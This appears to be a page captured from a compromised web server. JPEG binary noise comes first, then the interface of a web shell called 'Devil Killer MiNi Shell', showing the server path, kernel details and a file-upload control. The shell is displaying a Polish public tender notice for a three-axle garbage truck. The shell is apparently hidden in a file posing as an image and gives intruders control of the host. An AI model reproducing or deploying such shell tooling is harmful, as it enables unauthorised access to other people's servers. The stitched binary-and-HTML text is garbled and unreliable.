JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241107/0058297101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fabrycznie nowego samochodu ciężarowego z zabudową śmieciarki jednokomorowej na podwoziu trzyosiowym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Produkcyjno Usługowo Handlowe &#34;RADKOM&#34; Sp.z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670574883</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wincentego Witosa 94</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">483802000</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">483802033</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">radkom@radkom.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radkom.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fabrycznie nowego samochodu ciężarowego z zabudową śmieciarki jednokomorowej na podwoziu trzyosiowym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4eca7231-5340-4857-9ccd-21bce4ed9fa6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00582971</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4eca7231-5340-4857-9ccd-21bce4ed9fa6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia zgodnie z art. 61 ust. 1 ustawy Pzp komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/pl/. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>2. W niniejszym postępowaniu pytania do treści SWZ, wezwania, oświadczenia, wnioski, zawiadomienia, oraz informacje Zamawiający i Wykonawcy przekazują powołując się na nr ogłoszenia (BZP, lub ID postepowania) lub nr referencyjny postępowania tj. 12/2024. <br/>a)	za pośrednictwem „Formularza do komunikacji” dostępnego na Platformie <br/>e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/pl/ lub<br/>b)	drogą elektroniczną na adres: przetargi@radkom.com.pl, <br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Pozostałe wymagania znajdują się w pkt. 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego. <br/>Na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku (RODO) uprzejmie informujemy, że: <br/>1) Administratorem Pani/Pana danych osobowych jest PPUH „RADKOM” Sp. z o. o., ul. W. Witosa 94, 26-600 Radom;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@radkom.com.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">12/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa fabrycznie nowego samochodu ciężarowego z zabudową śmieciarki jednokomorowej na podwoziu trzyosiowym.<br/><br/>Wymagania dotyczące podwozia pojazdu<br/>1. Podwozie fabrycznie nowe - rok produkcji 2024, <br/>2. Podwozie o DMC 26000kg, <br/>3. Konfiguracja osi: 6x2, <br/>4. Pierwsza oś kierowana o nośności min. 8,0t zawieszona na resorach parabolicznych, wyposażone w amortyzatory i stabilizator, <br/>5. Druga oś napędowa na zawieszeniu pneumatycznym o nośności min. 11,0t, <br/>6. Trzecia oś skrętna o nośności min. 7,5t podnoszona z zawieszeniem pneumatycznym <br/>7. Pilot do sterowania wysokością jazdy, podnoszenia/obniżania tylnej osi i zatrzymania regulacji, <br/>8. Blokada mechanizmu różnicowego <br/>9. Rozstaw osi pojazdu 3800-4000 mm, <br/>10. Silnik wysokoprężny sześciocylindrowy, <br/>11. Silnik o pojemności min. 10000cm3, <br/>12. Moc silnika: min. 320KM, <br/>13.Norma emisji spalin: min. EURO 6, <br/>14. Maksymalny moment obrotowy silnika min. 1700 Nm, <br/>15. Zbiornik paliwa aluminiowy o pojemności min. 280l zamykany na kluczyk, <br/>16. Zbiornik AdBlue o pojemności min. 60l zamykany na kluczyk, <br/>17. Ogrzewany filtr wstępny paliwa, <br/>18. Dwucylindrowa sprężarka powietrza z ogrzewanym osuszaczem, <br/>19. Wentylowane hamulce tarczowe na osi przedniej i tylnej. Dwuobwodowy układ sprężonego powietrza i Elektroniczny układ hamulcowy (EBS), <br/>20. Zaawansowany układ hamulcowy z hamowaniem awaryjnym przed poprzedzającym pojazdem/obiektem, <br/>21. Elektropneumatycznie sterowany hamulec postojowy aktywowany ręcznie jak i automatycznie <br/>22. Radary martwego pola, lewy i prawy, <br/>23. Radar przedni martwego pola, monitorujący obszar ruchu przed pojazdem podczas postoju i jazdy <br/>24. Układ ostrzegania o opuszczeniu pasa ruchu, <br/>25. Elektroniczny układ kontroli stabilności jazdy, <br/>26. Układ kontroli przyczepności, <br/>27. Tylna przystawka od silnika, włączona na stałe, <br/>28. Automatyczna lub zautomatyzowana skrzynia biegów, <br/>29. Oprogramowanie skrzyni biegów zoptymalizowane do zabudowy śmieciarki, <br/>30. Tempomat, <br/>31 Osłona nadkoli i silnika, <br/>32. Opony w rozmiarze 315/80R/22,5, <br/>33. Koło zapasowe, <br/>34. Układ kontroli ciśnienia w ogumieniu, <br/>35. Pistolet na sprężone powietrze z elastycznym przewodem, <br/>36. Wąż do pompowania kół, <br/>37. Alternator min. 100A i akumulatory min. 2x220 Ah, <br/>38. Klimatyzacja, <br/>39. Elektrycznie otwierane szyby, <br/>40. Zasilanie akcesoriów w kabinie 12V i 24V, <br/>41. Fabryczny immobilizer, <br/>42.Kabina dzienna trzyosobowa, ze schowkami za miejscem kierowcy/pasażera, <br/>43. Kolor kabiny fabryczny biały, <br/>44. Fotel kierowcy na zawieszeniu pneumatycznym ze zintegrowanym zagłówkiem i trzypunktowym pasem bezpieczeństwa oraz podłokietnikiem, <br/>45. Dwa oddzielne fotele dla pasażerów z zagłówkami i trzypunktowymi pasami bezpieczeństwa, <br/>46. Lusterka główne i szerokokątne ogrzewane i regulowane elektrycznie, <br/>47. Centralny zamek z pilotem, <br/>48. Światła do jazdy dziennej w technologii LED, <br/>49. Reflektory przeciwmgielne LED, <br/>50. Obrysówki boczne, <br/>51. Dwa pomarańczowe światła ostrzegawcze na dachu kabiny lub belka świetlna, <br/>52. Roleta przeciwsłoneczna boczna, po stronie kierowcy, <br/>53. Tachograf cyfrowy, <br/>54. System multimedialny, który zawiera ekran dotykowy o przekątnej min. 15 cm zintegrowany z funkcjami przesyłania strumieniowego przez USB i Bluetooth i obsługą telefonu, <br/>55. Sygnał ostrzegawczy cofania, <br/>56. Pojazd wyposażony w: dywaniki gumowe, pokrowce na siedzenia, gaśnice – 2szt., apteczkę, trójkąt ostrzegawczy 2 szt., lewarek, tablicę z napisem ODPADY na przodzie pojazdu, klin pod koło 2 szt., <br/>57. Pojazd wyposażony w kosz na worki oraz zbiornik na czystą wodę z kranem po lewej lub po prawej stronie pojazdu, <br/>58. Pojazd musi posiadać świadectwo homologacji na pojazd skompletowany potwierdzające spełnienie warunków technicznych obowiązujących na terenie RP wystawione w języku polskim <br/>59. Wykonawca dostarczy wraz z pojazdem dokumenty, na podstawie których dokonuje się pierwszej rejestracji pojazdu nowego na terytorium RP, o których mowa w art. 72 ust. 1 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2021 r., poz. 450 ze zm.) <br/><br/>Wymagania dotyczące zabudowy pojazdu<br/>1. Nowa zabudowa skrzyniowa z urządzeniem załadowczym tylnym,<br/>2. Pojemności skrzyni ładunkowej min. 23 m3, bez uwzględnienia pojemności wanny odwłoka,<br/>3. Rok produkcji: 2024r,<br/>4. Wszystkie elementy składowe zabudowy malowane przed montażem. Malowanie podkładem, <br/>a następnie lakierowane na kolor biały odpowiadający kolorem kabiny podwozia,<br/>5. Całkowicie uszczelniony jednoczęściowy, integralny korpus skrzyni z odwłokiem ze zgniotem min. 5:1,<br/>6. Boki skrzyni ładunkowej wykonane z blachy konstrukcyjnej lub trudnościeralnej o grubości min. 4 mm,<br/>7. Dno skrzyni ładunkowej wykonane z wysokogatunkowej blachy konstrukcyjnej o podwyższonej odporności na ścierania lub trudnościeralnej o grubości min. 6 mm,<br/>8. Wanna załadowcza wykonana z blachy wysokogatunkowej trudnościeralnej o grubości dna min. 10 mm typu Hardox 450 lub równoważnej. Boki wanny o grubości min. 6 mm również z blachy wysokogatunkowej trudnościeralnej Hardox 450 lub równoważnej,<br/>9. Uszczelka między płytą wypychającą a ścianami bocznymi skrzyni na całej długości połączenia, nakładana jest na całą wysokość w celu zapewnienia maksymalnej szczelności podczas zbierania odpadów tzw. frakcji mokrych,<br/>10. Dolne zaczepy skrzyni ryglujące odwłok regulowane mimośrodowo z możliwością regulacji szczeliny między skrzynią a odwłokiem zwiększające szczelność w trakcie eksploatacji,<br/>11. Skrzynia ładunkowa o przekroju owalnym, <br/>12. Podłoga skrzyni zaokrąglona z otworem rewizyjnym z możliwością odprowadzenia odcieków,<br/>13. Ściany zabudowy płaskie wykonane z jednego arkusza blachy,<br/>14. Mechanizm zgniatania liniowo – płytowy (szufladowy),<br/>15. Możliwość sterowania mechanizmem załadowczym w cyklu automatycznym, ciągłym oraz manualnym, <br/>16. Prowadnice łopaty wypychającej wewnątrz zabudowy – po bokach,<br/>17. Urządzenie zasypowe obsługujące pojemniki o pojemności od 120 l do 1100 l zgodnie z normą MGB EN/PN 840 -1,- 2,- 3, <br/>18. Urządzenie zasypowe wykonane w konstrukcji stalowej zabezpieczone antykorozyjnie, demontowalne. Demontaż możliwy bez konieczności używania urządzeń tnących, <br/>19. Urządzenie zasypowe posiadające funkcję automatycznego pobierania i unoszenia pojemników <br/>i kontenerów na listwie grzebieniowej, funkcja automatycznego unoszenia pojemników rozłączalna przyciskiem na panelu sterowania z tyłu zabudowy,<br/>20. Automatyczne unoszenie urządzenia zasypowego do pozycji do jazdy w trakcie załączenia biegów do przodu lub biegu wstecznego,<br/>21. Ześlizg składany – burta odwłoka w konstrukcji stalowej, zabezpieczone antykorozyjnie,<br/>22. Gumowe wsporniki na belce urządzenia załadowczego służące oparciu burty odwłoka podczas <br/>jej opuszczenia,<br/>23. Dolna podpora pojemnika urządzenia zasypowego mechanicznie składana,<br/>24. Wysokość od podłoża do stałej krawędzi wrzutnika max. 1450 mm,<br/>25. Dwa stopnie dla ładowaczy z czujnikiem zajętości i opuszczenia stopnia oraz poręcze po bokach zabudowy zgodne z normą EN-PN 1501-01 08:2021,<br/>26. Sterowanie urządzeniem zasypowym za pośrednictwem ergonomicznie ulokowanych paneli sterujących zamontowane po obu stronach odwłoka,<br/>27. Funkcja automatycznego pick-up urządzenia zasypowego tj. automatyczne unoszenie pojemników <br/>na grzebieniu urządzenia zasypowego,<br/>28. Panel sterujący urządzeniem zasypowym ułatwiający opróżnianie pojemników 1100 litrów zamontowany na sztywnym ramieniu lub wsporniku w bliskiej przestrzeni mechanizmu zasypowego w miejscu ergonomicznym dla operatora na prawej stronie odwłoka oraz panel starowania umieszczony na lewej ścianie odwłoka, <br/>29. Możliwość opróżniania skrzyni ładunkowej z kabiny kierowcy, <br/>30. Oświetlenie wg obowiązujących przepisów o ruchu drogowym,<br/>31. Dwa wyłączniki bezpieczeństwa (stop awaryjny) umieszczone po obu stronach zabudowy, jeden w kabinie kierowcy,<br/>32. Płynna regulacja zgniotu,<br/>33. Kamera cofania z kolorowym monitorem umieszczonym w kabinie kierowcy (monitor min. 7’),<br/>34. Konstrukcja spawanej prasy składająca się z płyty nośnej - suwaka podnoszonego za pomocą siłowników oraz płyty zgarniającej-zgarniaka wraz z siłownikami,<br/>35. Po dwa siłowniki prasy oraz mechanizmu zgarniającego zamontowane wewnątrz odwłoka z tłoczyskami utwardzonymi powierzchniowo,<br/>36. Siłowniki otwierania odwłoka umieszczone na dachu zabudowy zabezpieczone osłonami,<br/>37. Układ uwalniania zakleszczonych pojemników,<br/>38. Oświetlenie robocze z boku i z tyłu skrzyni ładunkowej zgodne z obowiązującą normą PN-EN 1501-01:2021,<br/>39. Lampy ostrzegawcze LED z przodu i z tyłu zabudowy,<br/>40. Pasy odblaskowe na kabinie i odwłoku,<br/>41. Sygnał dźwiękowy przy cofaniu,<br/>42. Pojemnik z czystą wodą do mycia rąk z dozownikiem na mydło lub płyn dezynfekcyjny,<br/>43. Nadwozie zgodne z prawem unijnym ze znakiem CE i obowiązującą normą PN-EN 1501-01:2021,<br/>44. Możliwość odprowadzania odcieków ze skrzyni ładunkowej i wanny zasypowej,<br/>45. Możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy: prasy zagęszczającej oraz czasu pracy pompy hydraulicznej,<br/>46. Czujnik laserowy lub inny równoważny, montowany w przedniej części skrzyni pozwalający na rejestrowanie pozycji ściany wypychającej i pokazujący jej aktualną pozycję na wyświetlaczu w kabinie kierowcy. Wyświetlanie objętość już załadowanej, jak i jeszcze dostępnej, procentowe wypełnienie skrzyni i odległość ściany wypychającej od przedniej pozycji końcowej,<br/>47. Centralne smarowanie zabudowy I urządzenia zasypowego,<br/>48. Skrzynka narzędziowa w tworzywa sztucznego zamykana o pojemności min 120l,<br/>49. Taca ze stali nierdzewnej montowana pod skrzynią, przeznaczona do przechowywania np. rękawic operatorów, lakierowana w kolorze zabudowy, <br/>50. Instrukcja obsługi i eksploatacji w języku polskim w 2 egzemplarzach,<br/>51. Książka serwisowa<br/><br/>Szczegółowe warunki dostawy, serwisu, gwarancji i rękojmi znajdują się w treści SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144510-6 - Pojazdy do transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do przedmiotu zamówienia publicznego. <br/>2. Ocenie ofert podlegają tylko oferty niepodlegające odrzuceniu.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>4. Najwyższa liczba punktów wyznaczy najkorzystniejsza ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp i w SWZ oraz zostanie oceniona, jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/><br/>Ocena oferty (P) – suma punktów z poszczególnych kryteriów: P = A+ B + C.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 